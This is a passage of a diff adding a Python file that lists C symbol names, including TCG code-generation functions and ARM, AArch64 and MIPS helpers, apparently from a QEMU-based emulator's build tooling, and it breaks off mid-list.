'tb_jmp_remove', + 'tb_link_page', + 'tb_page_remove', + 'tb_phys_hash_func', + 'tb_phys_invalidate', + 'tb_reset_jump', + 'tb_set_jmp_target', + 'tcg_accel_class_init', + 'tcg_accel_type', + 'tcg_add_param_i32', + 'tcg_add_param_i64', + 'tcg_add_target_add_op_defs', + 'tcg_allowed', + 'tcg_canonicalize_memop', + 'tcg_commit', + 'tcg_cond_to_jcc', + 'tcg_constant_folding', + 'tcg_const_i32', + 'tcg_const_i64', + 'tcg_const_local_i32', + 'tcg_const_local_i64', + 'tcg_context_init', + 'tcg_cpu_address_space_init', + 'tcg_cpu_exec', + 'tcg_current_code_size', + 'tcg_dump_info', + 'tcg_dump_ops', + 'tcg_exec_all', + 'tcg_find_helper', + 'tcg_func_start', + 'tcg_gen_abs_i32', + 'tcg_gen_add2_i32', + 'tcg_gen_add_i32', + 'tcg_gen_add_i64', + 'tcg_gen_addi_i32', + 'tcg_gen_addi_i64', + 'tcg_gen_andc_i32', + 'tcg_gen_and_i32', + 'tcg_gen_and_i64', + 'tcg_gen_andi_i32', + 'tcg_gen_andi_i64', + 'tcg_gen_br', + 'tcg_gen_brcond_i32', + 'tcg_gen_brcond_i64', + 
'tcg_gen_brcondi_i32', + 'tcg_gen_bswap16_i32', + 'tcg_gen_bswap32_i32', + 'tcg_gen_callN', + 'tcg_gen_code', + 'tcg_gen_code_common', + 'tcg_gen_code_search_pc', + 'tcg_gen_concat_i32_i64', + 'tcg_gen_debug_insn_start', + 'tcg_gen_deposit_i32', + 'tcg_gen_exit_tb', + 'tcg_gen_ext16s_i32', + 'tcg_gen_ext16u_i32', + 'tcg_gen_ext32s_i64', + 'tcg_gen_ext32u_i64', + 'tcg_gen_ext8s_i32', + 'tcg_gen_ext8u_i32', + 'tcg_gen_ext_i32_i64', + 'tcg_gen_extu_i32_i64', + 'tcg_gen_goto_tb', + 'tcg_gen_ld_i32', + 'tcg_gen_ld_i64', + 'tcg_gen_ldst_op_i32', + 'tcg_gen_ldst_op_i64', + 'tcg_gen_movcond_i32', + 'tcg_gen_movcond_i64', + 'tcg_gen_mov_i32', + 'tcg_gen_mov_i64', + 'tcg_gen_movi_i32', + 'tcg_gen_movi_i64', + 'tcg_gen_mul_i32', + 'tcg_gen_muls2_i32', + 'tcg_gen_mulu2_i32', + 'tcg_gen_neg_i32', + 'tcg_gen_neg_i64', + 'tcg_gen_not_i32', + 'tcg_gen_op0', + 'tcg_gen_op1i', + 'tcg_gen_op2_i32', + 'tcg_gen_op2_i64', + 'tcg_gen_op2i_i32', + 'tcg_gen_op2i_i64', + 'tcg_gen_op3_i32', + 'tcg_gen_op3_i64', + 'tcg_gen_op4_i32', + 'tcg_gen_op4i_i32', + 'tcg_gen_op4ii_i32', + 'tcg_gen_op4ii_i64', + 'tcg_gen_op5ii_i32', + 'tcg_gen_op6_i32', + 'tcg_gen_op6i_i32', + 'tcg_gen_op6i_i64', + 'tcg_gen_orc_i32', + 'tcg_gen_or_i32', + 'tcg_gen_or_i64', + 'tcg_gen_ori_i32', + 'tcg_gen_qemu_ld_i32', + 'tcg_gen_qemu_ld_i64', + 'tcg_gen_qemu_st_i32', + 'tcg_gen_qemu_st_i64', + 'tcg_gen_rotl_i32', + 'tcg_gen_rotli_i32', + 'tcg_gen_rotr_i32', + 'tcg_gen_rotri_i32', + 'tcg_gen_sar_i32', + 'tcg_gen_sari_i32', + 'tcg_gen_setcond_i32', + 'tcg_gen_shl_i32', + 'tcg_gen_shl_i64', + 'tcg_gen_shli_i32', + 'tcg_gen_shli_i64', + 'tcg_gen_shr_i32', + 'tcg_gen_shifti_i64', + 'tcg_gen_shr_i64', + 'tcg_gen_shri_i32', + 'tcg_gen_shri_i64', + 'tcg_gen_st_i32', + 'tcg_gen_st_i64', + 'tcg_gen_sub_i32', + 'tcg_gen_sub_i64', + 'tcg_gen_subi_i32', + 'tcg_gen_trunc_i64_i32', + 'tcg_gen_trunc_shr_i64_i32', + 'tcg_gen_xor_i32', + 'tcg_gen_xor_i64', + 'tcg_gen_xori_i32', + 'tcg_get_arg_str_i32', + 'tcg_get_arg_str_i64', + 
'tcg_get_arg_str_idx', + 'tcg_global_mem_new_i32', + 'tcg_global_mem_new_i64', + 'tcg_global_mem_new_internal', + 'tcg_global_reg_new_i32', + 'tcg_global_reg_new_i64', + 'tcg_global_reg_new_internal', + 'tcg_handle_interrupt', + 'tcg_init', + 'tcg_invert_cond', + 'tcg_la_bb_end', + 'tcg_la_br_end', + 'tcg_la_func_end', + 'tcg_liveness_analysis', + 'tcg_malloc', + 'tcg_malloc_internal', + 'tcg_op_defs_org', + 'tcg_opt_gen_mov', + 'tcg_opt_gen_movi', + 'tcg_optimize', + 'tcg_out16', + 'tcg_out32', + 'tcg_out64', + 'tcg_out8', + 'tcg_out_addi', + 'tcg_out_branch', + 'tcg_out_brcond32', + 'tcg_out_brcond64', + 'tcg_out_bswap32', + 'tcg_out_bswap64', + 'tcg_out_call', + 'tcg_out_cmp', + 'tcg_out_ext16s', + 'tcg_out_ext16u', + 'tcg_out_ext32s', + 'tcg_out_ext32u', + 'tcg_out_ext8s', + 'tcg_out_ext8u', + 'tcg_out_jmp', + 'tcg_out_jxx', + 'tcg_out_label', + 'tcg_out_ld', + 'tcg_out_modrm', + 'tcg_out_modrm_offset', + 'tcg_out_modrm_sib_offset', + 'tcg_out_mov', + 'tcg_out_movcond32', + 'tcg_out_movcond64', + 'tcg_out_movi', + 'tcg_out_op', + 'tcg_out_pop', + 'tcg_out_push', + 'tcg_out_qemu_ld', + 'tcg_out_qemu_ld_direct', + 'tcg_out_qemu_ld_slow_path', + 'tcg_out_qemu_st', + 'tcg_out_qemu_st_direct', + 'tcg_out_qemu_st_slow_path', + 'tcg_out_reloc', + 'tcg_out_rolw_8', + 'tcg_out_setcond32', + 'tcg_out_setcond64', + 'tcg_out_shifti', + 'tcg_out_st', + 'tcg_out_tb_finalize', + 'tcg_out_tb_init', + 'tcg_out_tlb_load', + 'tcg_out_vex_modrm', + 'tcg_patch32', + 'tcg_patch8', + 'tcg_pcrel_diff', + 'tcg_pool_reset', + 'tcg_prologue_init', + 'tcg_ptr_byte_diff', + 'tcg_reg_alloc', + 'tcg_reg_alloc_bb_end', + 'tcg_reg_alloc_call', + 'tcg_reg_alloc_mov', + 'tcg_reg_alloc_movi', + 'tcg_reg_alloc_op', + 'tcg_reg_alloc_start', + 'tcg_reg_free', + 'tcg_reg_sync', + 'tcg_set_frame', + 'tcg_set_nop', + 'tcg_swap_cond', + 'tcg_target_callee_save_regs', + 'tcg_target_call_iarg_regs', + 'tcg_target_call_oarg_regs', + 'tcg_target_const_match', + 'tcg_target_init', + 
'tcg_target_qemu_prologue', + 'tcg_target_reg_alloc_order', + 'tcg_temp_alloc', + 'tcg_temp_free_i32', + 'tcg_temp_free_i64', + 'tcg_temp_free_internal', + 'tcg_temp_local_new_i32', + 'tcg_temp_local_new_i64', + 'tcg_temp_new_i32', + 'tcg_temp_new_i64', + 'tcg_temp_new_internal', + 'tcg_temp_new_internal_i32', + 'tcg_temp_new_internal_i64', + 'tdb_hash', + 'teecr_write', + 'teehbr_access', + 'temp_allocate_frame', + 'temp_dead', + 'temps_are_copies', + 'temp_save', + 'temp_sync', + 'tgen_arithi', + 'tgen_arithr', + 'thumb2_logic_op', + 'ti925t_initfn', + 'tlb_add_large_page', + 'tlb_flush_entry', + 'tlbi_aa64_asid_is_write', + 'tlbi_aa64_asid_write', + 'tlbi_aa64_vaa_is_write', + 'tlbi_aa64_vaa_write', + 'tlbi_aa64_va_is_write', + 'tlbi_aa64_va_write', + 'tlbiall_is_write', + 'tlbiall_write', + 'tlbiasid_is_write', + 'tlbiasid_write', + 'tlbimvaa_is_write', + 'tlbimvaa_write', + 'tlbimva_is_write', + 'tlbimva_write', + 'tlb_is_dirty_ram', + 'tlb_protect_code', + 'tlb_reset_dirty_range', + 'tlb_reset_dirty_range_all', + 'tlb_set_dirty', + 'tlb_set_dirty1', + 'tlb_unprotect_code_phys', + 'tlb_vaddr_to_host', + 'token_get_type', + 'token_get_value', + 'token_is_escape', + 'token_is_keyword', + 'token_is_operator', + 'tokens_append_from_iter', + 'to_qiv', + 'to_qov', + 'tosa_init', + 'tosa_machine_init', + 'tswap32', + 'tswap64', + 'type_class_get_size', + 'type_get_by_name', + 'type_get_parent', + 'type_has_parent', + 'type_initialize', + 'type_initialize_interface', + 'type_is_ancestor', + 'type_new', + 'type_object_get_size', + 'type_register_internal', + 'type_table_add', + 'type_table_get', + 'type_table_lookup', + 'uint16_to_float32', + 'uint16_to_float64', + 'uint32_to_float32', + 'uint32_to_float64', + 'uint64_to_float128', + 'uint64_to_float32', + 'uint64_to_float64', + 'unassigned_io_ops', + 'unassigned_io_read', + 'unassigned_io_write', + 'unassigned_mem_accepts', + 'unassigned_mem_ops', + 'unassigned_mem_read', + 'unassigned_mem_write', + 'update_spsel', + 
'v6_cp_reginfo', + 'v6k_cp_reginfo', + 'v7_cp_reginfo', + 'v7mp_cp_reginfo', + 'v7m_pop', + 'v7m_push', + 'v8_cp_reginfo', + 'v8_el2_cp_reginfo', + 'v8_el3_cp_reginfo', + 'v8_el3_no_el2_cp_reginfo', + 'vapa_cp_reginfo', + 'vbar_write', + 'vfp_exceptbits_from_host', + 'vfp_exceptbits_to_host', + 'vfp_get_fpcr', + 'vfp_get_fpscr', + 'vfp_get_fpsr', + 'vfp_reg_offset', + 'vfp_set_fpcr', + 'vfp_set_fpscr', + 'vfp_set_fpsr', + 'visit_end_implicit_struct', + 'visit_end_list', + 'visit_end_struct', + 'visit_end_union', + 'visit_get_next_type', + 'visit_next_list', + 'visit_optional', + 'visit_start_implicit_struct', + 'visit_start_list', + 'visit_start_struct', + 'visit_start_union', + 'vmsa_cp_reginfo', + 'vmsa_tcr_el1_write', + 'vmsa_ttbcr_raw_write', + 'vmsa_ttbcr_reset', + 'vmsa_ttbcr_write', + 'vmsa_ttbr_write', + 'write_cpustate_to_list', + 'write_list_to_cpustate', + 'write_raw_cp_reg', + 'X86CPURegister32_lookup', + 'x86_op_defs', + 'xpsr_read', + 'xpsr_write', + 'xscale_cpar_write', + 'xscale_cp_reginfo' +) + +arm_symbols = ( + 'ARM_REGS_STORAGE_SIZE', +) + +aarch64_symbols = ( + 'ARM64_REGS_STORAGE_SIZE', + 'arm64_release', + 'arm64_reg_reset', + 'arm64_reg_read', + 'arm64_reg_write', + 'gen_a64_set_pc_im', + 'aarch64_cpu_register_types', + 'helper_udiv64', + 'helper_sdiv64', + 'helper_cls64', + 'helper_cls32', + 'helper_rbit64', + 'helper_vfp_cmps_a64', + 'helper_vfp_cmpes_a64', + 'helper_vfp_cmpd_a64', + 'helper_vfp_cmped_a64', + 'helper_vfp_mulxs', + 'helper_vfp_mulxd', + 'helper_simd_tbl', + 'helper_neon_ceq_f64', + 'helper_neon_cge_f64', + 'helper_neon_cgt_f64', + 'helper_recpsf_f32', + 'helper_recpsf_f64', + 'helper_rsqrtsf_f32', + 'helper_rsqrtsf_f64', + 'helper_neon_addlp_s8', + 'helper_neon_addlp_u8', + 'helper_neon_addlp_s16', + 'helper_neon_addlp_u16', + 'helper_frecpx_f32', + 'helper_frecpx_f64', + 'helper_fcvtx_f64_to_f32', + 'helper_crc32_64', + 'helper_crc32c_64', + 'aarch64_cpu_do_interrupt', + +) + +mips_symbols = ( + 'cpu_mips_exec', + 
'cpu_mips_get_random', + 'cpu_mips_get_count', + 'cpu_mips_store_count', + 'cpu_mips_store_compare', + 'cpu_mips_start_count', + 'cpu_mips_stop_count', + 'mips_machine_init', + 'cpu_mips_kseg0_to_phys', + 'cpu_mips_phys_to_kseg0', + 'cpu_mips_kvm_um_phys_to_kseg0', + 'mips_cpu_register_types', + 'cpu_mips_init', + 'cpu_state_reset', + 'helper_msa_andi_b', + 'helper_msa_ori_b', + 'helper_msa_nori_b', + 'helper_msa_xori_b', + 'helper_msa_bmnzi_b', + 'helper_msa_bmzi_b', + 'helper_msa_bseli_b', + 'helper_msa_shf_df', + 'helper_msa_and_v', + 'helper_msa_or_v', + 'helper_msa_nor_v', + 'helper_msa_xor_v', + 'helper_msa_bmnz_v', + 'helper_msa_bmz_v', + 'helper_msa_bsel_v', + 'helper_msa_addvi_df', + 'helper_msa_subvi_df', + 'helper_msa_ceqi_df', + 'helper_msa_clei_s_df', + 'helper_msa_clei_u_df', + 'helper_msa_clti_s_df', + 'helper_msa_clti_u_df', + 'helper_msa_maxi_s_df', + 'helper_msa_maxi_u_df', + 'helper_msa_mini_s_df', + 'helper_msa_mini_u_df', + 'helper_msa_ldi_df', + 'helper_msa_slli_df', + 'helper_msa_srai_df', + 'helper_msa_srli_df', + 'helper_msa_bclri_df', + 'helper_msa_bseti_df', + 'helper_msa_bnegi_df', + 'helper_msa_sat_s_df', + 'helper_msa_sat_u_df', + 'helper_msa_srari_df', + 'helper_msa_srlri_df', + 'helper_msa_binsli_df', + 'helper_msa_binsri_df', + 'helper_msa_sll_df', + 'helper_msa_sra_df', + 'helper_msa_srl_df', + 'helper_msa_bclr_df', + 'helper_msa_bset_df', + 'helper_msa_bneg_df', + 'helper_msa_addv_df', + 'helper_msa_subv_df', + 'helper_msa_max_s_df', + 'helper_msa_max_u_df', + 'helper_msa_min_s_df', + 'helper_msa_min_u_df', + 'helper_msa_max_a_df', + 'helper_msa_min_a_df', + 'helper_msa_ceq_df', + 'helper_msa_clt_s_df', + 'helper_msa_clt_u_df', + 'helper_msa_cle_s_df', + 'helper_msa_cle_u_df', + 'helper_msa_add_a_df', + 'helper_msa_adds_a_df', + 'helper_msa_adds_s_df', + 'helper_msa_adds_u_df', + 'helper_msa_ave_s_df', + 'helper_msa_ave_u_df', + 'helper_msa_aver_s_df', + 'helper_msa_aver_u_df', + 'helper_msa_subs_s_df', + 'helper_msa_subs_u_df', + 
'helper_msa_subsus_u_df', + 'helper_msa_subsuu_s_df', + 'helper_msa_asub_s_df', + 'helper_msa_asub_u_df', + 'helper_msa_mulv_df', + 'helper_msa_div_s_df', + 'helper_msa_div_u_df', + 'helper_msa_mod_s_df', + 'helper_msa_mod_u_df', + 'helper_msa_dotp_s_df', + 'helper_msa_dotp_u_df', + 'helper_msa_srar_df', + 'helper_msa_srlr_df', + 'helper_msa_hadd_s_df', + 'helper_msa_hadd_u_df', + 'helper_msa_hsub_s_df', + 'helper_msa_hsub_u_df', + 'helper_msa_mul_q_df', + 'helper_msa_mulr_q_df', + 'helper_msa_sld_df', + 'helper_msa_maddv_df', + 'helper_msa_msubv_df', + 'helper_msa_dpadd_s_df', + 'helper_msa_dpadd_u_df', + 'helper_msa_dpsub_s_df', + 'helper_msa_dpsub_u_df', + 'helper_msa_binsl_df', + 'helper_msa_binsr_df', + 'helper_msa_madd_q_df', + 'helper_msa_msub_q_df', + 'helper_msa_maddr_q_df', + 'helper_msa_msubr_q_df', + 'helper_msa_splat_df', + 'helper_msa_pckev_df', + 'helper_msa_pckod_df', + 'helper_msa_ilvl_df', + 'helper_msa_ilvr_df', + 'helper_msa_ilvev_df', + 'helper_msa_ilvod_df', + 'helper_msa_vshf_df', + 'helper_msa_sldi_df', + 'helper_msa_splati_df', + 'helper_msa_copy_s_df', + 'helper_msa_copy_u_df', + 'helper_msa_insert_df', + 'helper_msa_insve_df', + 'helper_msa_ctcmsa', + 'helper_msa_cfcmsa', + 'helper_msa_move_v', + 'helper_msa_fill_df', + 'helper_msa_nlzc_df', + 'helper_msa_nloc_df', + 'helper_msa_pcnt_df', + 'helper_msa_fcaf_df', + 'helper_msa_fcun_df', + 'helper_msa_fceq_df', + 'helper_msa_fcueq_df', + 'helper_msa_fclt_df', + 'helper_msa_fcult_df', + 'helper_msa_fcle_df', + 'helper_msa_fcule_df', + 'helper_msa_fsaf_df', + 'helper_msa_fsun_df', + 'helper_msa_fseq_df', + 'helper_msa_fsueq_df', + 'helper_msa_fslt_df', + 'helper_msa_fsult_df', + 'helper_msa_fsle_df', + 'helper_msa_fsule_df', + 'helper_msa_fcor_df', + 'helper_msa_fcune_df', + 'helper_msa_fcne_df', + 'helper_msa_fsor_df', + 'helper_msa_fsune_df', + 'helper_msa_fsne_df', + 'helper_msa_fadd_df', + 'helper_msa_fsub_df', + 'helper_msa_fmul_df', + 'helper_msa_fdiv_df', + 'helper_msa_fmadd_df', + 
'helper_msa_fmsub_df', + 'helper_msa_fexp2_df', + 'helper_msa_fexdo_df', + 'helper_msa_ftq_df', + 'helper_msa_fmin_df', + 'helper_msa_fmin_a_df', + 'helper_msa_fmax_df', + 'helper_msa_fmax_a_df', + 'helper_msa_fclass_df', + 'helper_msa_ftrunc_s_df', + 'helper_msa_ftrunc_u_df', + 'helper_msa_fsqrt_df', + 'helper_msa_frsqrt_df', + 'helper_msa_frcp_df', + 'helper_msa_frint_df', + 'helper_msa_flog2_df', + 'helper_msa_fexupl_df', + 'helper_msa_fexupr_df', + 'helper_msa_ffql_df', + 'helper_msa_ffqr_df', + 'helper_msa_ftint_s_df', + 'helper_msa_ftint_u_df', + 'helper_msa_ffint_s_df', + 'helper_msa_ffint_u_df', + 'helper_paddsb', + 'helper_paddusb', + 'helper_paddsh', + 'helper_paddush', + 'helper_paddb', + 'helper_paddh', + 'helper_paddw', + 'helper_psubsb', + 'helper_psubusb', + 'helper_psubsh', + 'helper_psubush', + 'helper_psubb', + 'helper_psubh', + 'helper_psubw', + 'helper_pshufh', + 'helper_packsswh', + 'helper_packsshb', + 'helper_packushb', + 'helper_punpcklwd', + 'helper_punpckhwd', + 'helper_punpcklhw', + 'helper_punpckhhw', + 'helper_punpcklbh', + 'helper_punpckhbh', + 'helper_pavgh', + 'helper_pavgb', + 'helper_pmaxsh', + 'helper_pminsh', + 'helper_pmaxub', + 'helper_pminub', + 'helper_pcmpeqw', + 'helper_pcmpgtw', + 'helper_pcmpeqh', + 'helper_pcmpgth', + 'helper_pcmpeqb', + 'helper_pcmpgtb', + 'helper_psllw', + 'helper_psrlw', + 'helper_psraw', + 'helper_psllh', + 'helper_psrlh', + 'helper_psrah', + 'helper_pmullh', + 'helper_pmulhh', + 'helper_pmulhuh', + 'helper_pmaddhw', + 'helper_pasubub', + 'helper_biadd', + 'helper_pmovmskb', + 'helper_absq_s_ph', + 'helper_absq_s_qb', + 'helper_absq_s_w', + 'helper_addqh_ph', + 'helper_addqh_r_ph', + 'helper_addqh_r_w', + 'helper_addqh_w', + 'helper_adduh_qb', + 'helper_adduh_r_qb', + 'helper_subqh_ph', + 'helper_subqh_r_ph', + 'helper_subqh_r_w', + 'helper_subqh_w', + 'helper_addq_ph', + 'helper_addq_s_ph', + 'helper_addq_s_w', + 'helper_addu_ph', + 'helper_addu_qb', + 'helper_addu_s_ph', + 'helper_addu_s_qb', + 
'helper_subq_ph', + 'helper_subq_s_ph', + 'helper_subq_s_w', + 'helper_subu_ph', + 'helper_subu_qb', + 'helper_subu_s_ph', + 'helper_subu_s_qb', + 'helper_subuh_qb', + 'helper_subuh_r_qb', + 'helper_addsc', + 'helper_addwc', + 'helper_modsub', + 'helper_raddu_w_qb', + 'helper_precr_qb_ph', + 'helper_precrq_qb_ph', + 'helper_precr_sra_ph_w', + 'helper_precr_sra_r_ph_w', + 'helper_precrq_ph_w', + 'helper_precrq_rs_ph_w', + 'helper_precrqu_s_qb_ph', + 'helper_precequ_ph_qbl', + 'helper_precequ_ph_qbr', + 'helper_precequ_ph_qbla', + 'helper_precequ_ph_qbra', + 'helper_preceu_ph_qbl', + 'helper_preceu_ph_qbr', + 'helper_preceu_ph_qbla', + 'helper_preceu_ph_qbra', + 'helper_shll_qb', + 'helper_shrl_qb', + 'helper_shra_qb', + 'helper_shra_r_qb', + 'helper_shll_ph', + 'helper_shll_s_ph', + 'helper_shll_s_w', + 'helper_shra_r_w', + 'helper_shrl_ph', + 'helper_shra_ph', + 'helper_shra_r_ph', + 'helper_muleu_s_ph_qbl', + 'helper_muleu_s_ph_qbr', + 'helper_mulq_rs_ph', + 'helper_mul_ph', + 'helper_mul_s_ph', + 'helper_mulq_s_ph', + 'helper_muleq_s_w_phl', + 'helper_muleq_s_w_phr', + 'helper_mulsaq_s_w_ph', + 'helper_mulsa_w_ph', + 'helper_dpau_h_qbl', + 'helper_dpau_h_qbr', + 'helper_dpsu_h_qbl', + 'helper_dpsu_h_qbr', + 'helper_dpa_w_ph', + 'helper_dpax_w_ph', + 'helper_dps_w_ph', + 'helper_dpsx_w_ph', + 'helper_dpaq_s_w_ph', + 'helper_dpaqx_s_w_ph', + 'helper_dpsq_s_w_ph', + 'helper_dpsqx_s_w_ph', + 'helper_dpaqx_sa_w_ph', + 'helper_dpsqx_sa_w_ph', + 'helper_dpaq_sa_l_w', + 'helper_dpsq_sa_l_w', + 'helper_maq_s_w_phl', + 'helper_maq_s_w_phr', + 'helper_maq_sa_w_phl', + 'helper_maq_sa_w_phr', + 'helper_mulq_s_w', + 'helper_mulq_rs_w', + 'helper_bitrev', + 'helper_insv', + 'helper_cmpgu_eq_qb', + 'helper_cmpgu_lt_qb', + 'helper_cmpgu_le_qb', + 'helper_cmpu_eq_qb', + 'helper_cmpu_lt_qb', + 'helper_cmpu_le_qb', + 'helper_cmp_eq_ph', + 'helper_cmp_lt_ph', + 'helper_cmp_le_ph', + 'helper_pick_qb', + 'helper_pick_ph', + 'helper_packrl_ph', + 'helper_extr_w', + 'helper_extr_r_w', + 
'helper_extr_rs_w', + 'helper_extr_s_h', + 'helper_extp', + 'helper_extpdp', + 'helper_shilo', + 'helper_mthlip', + 'cpu_wrdsp', + 'helper_wrdsp', + 'cpu_rddsp', + 'helper_rddsp', + 'helper_raise_exception_err', + 'helper_clo', + 'helper_clz', + 'helper_muls', + 'helper_mulsu', + 'helper_macc', + 'helper_macchi', + 'helper_maccu', + 'helper_macchiu', + 'helper_msac', + 'helper_msachi', + 'helper_msacu', + 'helper_msachiu', + 'helper_mulhi', + 'helper_mulhiu', + 'helper_mulshi', + 'helper_mulshiu', + 'helper_bitswap', + 'helper_ll', + 'helper_sc', + 'helper_swl', + 'helper_swr', + 'helper_lwm', + 'helper_swm', + 'helper_mfc0_mvpcontrol', + 'helper_mfc0_mvpconf0', + 'helper_mfc0_mvpconf1', + 'helper_mfc0_random', + 'helper_mfc0_tcstatus', + 'helper_mftc0_tcstatus', + 'helper_mfc0_tcbind', + 'helper_mftc0_tcbind', + 'helper_mfc0_tcrestart', + 'helper_mftc0_tcrestart', + 'helper_mfc0_tchalt', + 'helper_mftc0_tchalt', + 'helper_mfc0_tccontext', + 'helper_mftc0_tccontext', + 'helper_mfc0_tcschedule', + 'helper_mftc0_tcschedule', + 'helper_mfc0_tcschefback', + 'helper_mftc0_tcschefback', + 'helper_mfc0_count', + 'helper_mftc0_entryhi', + 'helper_mftc0_cause', + 'helper_mftc0_status', + 'helper_mfc0_lladdr', + 'helper_mfc0_watchlo', + 'helper_mfc0_watchhi', + 'helper_mfc0_debug', + 'helper_mftc0_debug', + 'helper_mtc0_index', + 'helper_mtc0_mvpcontrol', + 'helper_mtc0_vpecontrol', + 'helper_mttc0_vpecontrol', + 'helper_mftc0_vpecontrol', + 'helper_mftc0_vpeconf0', + 'helper_mtc0_vpeconf0', + 'helper_mttc0_vpeconf0', + 'helper_mtc0_vpeconf1', + 'helper_mtc0_yqmask', + 'helper_mtc0_vpeopt', + 'helper_mtc0_entrylo0', + 'helper_mtc0_tcstatus', + 'helper_mttc0_tcstatus', + 'helper_mtc0_tcbind', + 'helper_mttc0_tcbind', + 'helper_mtc0_tcrestart', + 'helper_mttc0_tcrestart', + 'helper_mtc0_tchalt', + 'helper_mttc0_tchalt', + 'helper_mtc0_tccontext', + 'helper_mttc0_tccontext', + 'helper_mtc0_tcschedule', + 'helper_mttc0_tcschedule', + 'helper_mtc0_tcschefback', + 
'helper_mttc0_tcschefback', + 'helper_mtc0_entrylo1', + 'helper_mtc0_context', + 'helper_mtc0_pagemask', + 'helper_mtc0_pagegrain', + 'helper_mtc0_wired', + 'helper_mtc0_srsconf0', + 'helper_mtc0_srsconf1', + 'helper_mtc0_srsconf2', + 'helper_mtc0_srsconf3', + 'helper_mtc0_srsconf4', + 'helper_mtc0_hwrena', + 'helper_mtc0_count', + 'helper_mtc0_entryhi', + 'helper_mttc0_entryhi', + 'helper_mtc0_compare', + 'helper_mtc0_status', + 'helper_mttc0_status', + 'helper_mtc0_intctl', + 'helper_mtc0_srsctl', + 'helper_mtc0_cause', + 'helper_mttc0_cause', + 'helper_mftc0_epc', + 'helper_mftc0_ebase', + 'helper_mtc0_ebase', + 'helper_mttc0_ebase', + 'helper_mftc0_configx', + 'helper_mtc0_config0', + 'helper_mtc0_config2', + 'helper_mtc0_config4', + 'helper_mtc0_config5', + 'helper_mtc0_lladdr', + 'helper_mtc0_watchlo', + 'helper_mtc0_watchhi', + 'helper_mtc0_xcontext', + 'helper_mtc0_framemask', + 'helper_mtc0_debug', + 'helper_mttc0_debug', + 'helper_mtc0_performance0', + 'helper_mtc0_taglo', + 'helper_mtc0_datalo', + 'helper_mtc0_taghi', + 'helper_mtc0_datahi', + 'helper_mftgpr', + 'helper_mftlo', + 'helper_mfthi', + 'helper_mftacx', + 'helper_mftdsp', + 'helper_mttgpr', + 'helper_mttlo', + 'helper_mtthi', + 'helper_mttacx', + 'helper_mttdsp', + 'helper_dmt', + 'helper_emt', + 'helper_dvpe', + 'helper_evpe', + 'helper_fork', + 'helper_yield', + 'r4k_helper_tlbinv', + 'r4k_helper_tlbinvf', + 'r4k_helper_tlbwi', + 'r4k_helper_tlbwr', + 'r4k_helper_tlbp', + 'r4k_helper_tlbr', + 'helper_tlbwi', + 'helper_tlbwr', + 'helper_tlbp', + 'helper_tlbr', + 'helper_tlbinv', + 'helper_tlbinvf', + 'helper_di', + 'helper_ei', + 'helper_eret', + 'helper_deret', + 'helper_rdhwr_cpunum', + 'helper_rdhwr_synci_step', + 'helper_rdhwr_cc', + 'helper_rdhwr_ccres', + 'helper_pmon', + 'helper_wait', + 'mips_cpu_do_unaligned_access', + 'mips_cpu_unassigned_access', + 'ieee_rm', + 'helper_cfc1', + 'helper_ctc1', + 'ieee_ex_to_mips', + 'helper_float_sqrt_d', + 'helper_float_sqrt_s', + 
'helper_float_cvtd_s', + 'helper_float_cvtd_w', + 'helper_float_cvtd_l', + 'helper_float_cvtl_d', + 'helper_float_cvtl_s', + 'helper_float_cvtps_pw', + 'helper_float_cvtpw_ps', + 'helper_float_cvts_d', + 'helper_float_cvts_w', + 'helper_float_cvts_l', + 'helper_float_cvts_pl', + 'helper_float_cvts_pu', + 'helper_float_cvtw_s', + 'helper_float_cvtw_d', + 'helper_float_roundl_d', + 'helper_float_roundl_s', + 'helper_float_roundw_d', + 'helper_float_roundw_s', + 'helper_float_truncl_d', + 'helper_float_truncl_s', + 'helper_float_truncw_d', + 'helper_float_truncw_s', + 'helper_float_ceill_d', + 'helper_float_ceill_s', + 'helper_float_ceilw_d', + 'helper_float_ceilw_s', + 'helper_float_floorl_d', + 'helper_float_floorl_s', + 'helper_float_floorw_d', + 'helper_float_floorw_s', + 'helper_float_abs_d', + 'helper_float_abs_s', + 'helper_float_abs_ps', + 'helper_float_chs_d', + 'helper_float_chs_s', + 'helper_float_chs_ps', + 'helper_float_maddf_s', + 'helper_float_maddf_d', + 'helper_float_msubf_s', + 'helper_float_msubf_d', + 'helper_float_max_s', + 'helper_float_max_d', + 'helper_float_maxa_s', + 'helper_float_maxa_d', + 'helper_float_min_s', + 'helper_float_min_d', + 'helper_float_mina_s', + 'helper_float_mina_d', + 'helper_float_rint_s', + 'helper_float_rint_d', + 'helper_float_class_s', + 'helper_float_class_d', + 'helper_float_recip_d', + 'helper_float_recip_s', + 'helper_float_rsqrt_d', + 'helper_float_rsqrt_s', + 'helper_float_recip1_d', + 'helper_float_recip1_s', + 'helper_float_recip1_ps', + 'helper_float_rsqrt1_d', + 'helper_float_rsqrt1_s', + 'helper_float_rsqrt1_ps', + 'helper_float_add_d', + 'helper_float_add_s', + 'helper_float_add_ps', + 'helper_float_sub_d', + 'helper_float_sub_s', + 'helper_float_sub_ps', + 'helper_float_mul_d', + 'helper_float_mul_s', + 'helper_float_mul_ps', + 'helper_float_div_d', + 'helper_float_div_s', + 'helper_float_div_ps', + 'helper_float_madd_d', + 'helper_float_madd_s', + 'helper_float_madd_ps', + 'helper_float_msub_d', + 
'helper_float_msub_s', + 'helper_float_msub_ps', + 'helper_float_nmadd_d', + 'helper_float_nmadd_s', + 'helper_float_nmadd_ps', + 'helper_float_nmsub_d', + 'helper_float_nmsub_s', + 'helper_float_nmsub_ps', + 'helper_float_recip2_d', + 'helper_float_recip2_s', + 'helper_float_recip2_ps', + 'helper_float_rsqrt2_d', + 'helper_float_rsqrt2_s', + 'helper_float_rsqrt2_ps', + 'helper_float_addr_ps', + 'helper_float_mulr_ps', + 'helper_cmp_d_f', + 'helper_cmpabs_d_f', + 'helper_cmp_d_un', + 'helper_cmpabs_d_un', + 'helper_cmp_d_eq', + 'helper_cmpabs_d_eq', + 'helper_cmp_d_ueq', + 'helper_cmpabs_d_ueq', + 'helper_cmp_d_olt', + 'helper_cmpabs_d_olt', + 'helper_cmp_d_ult', + 'helper_cmpabs_d_ult', + 'helper_cmp_d_ole', + 'helper_cmpabs_d_ole', + 'helper_cmp_d_ule', + 'helper_cmpabs_d_ule', + 'helper_cmp_d_sf', + 'helper_cmpabs_d_sf', + 'helper_cmp_d_ngle', + 'helper_cmpabs_d_ngle', + 'helper_cmp_d_seq', + 'helper_cmpabs_d_seq', + 'helper_cmp_d_ngl', + 'helper_cmpabs_d_ngl', + 'helper_cmp_d_lt', + 'helper_cmpabs_d_lt', + 'helper_cmp_d_nge', + 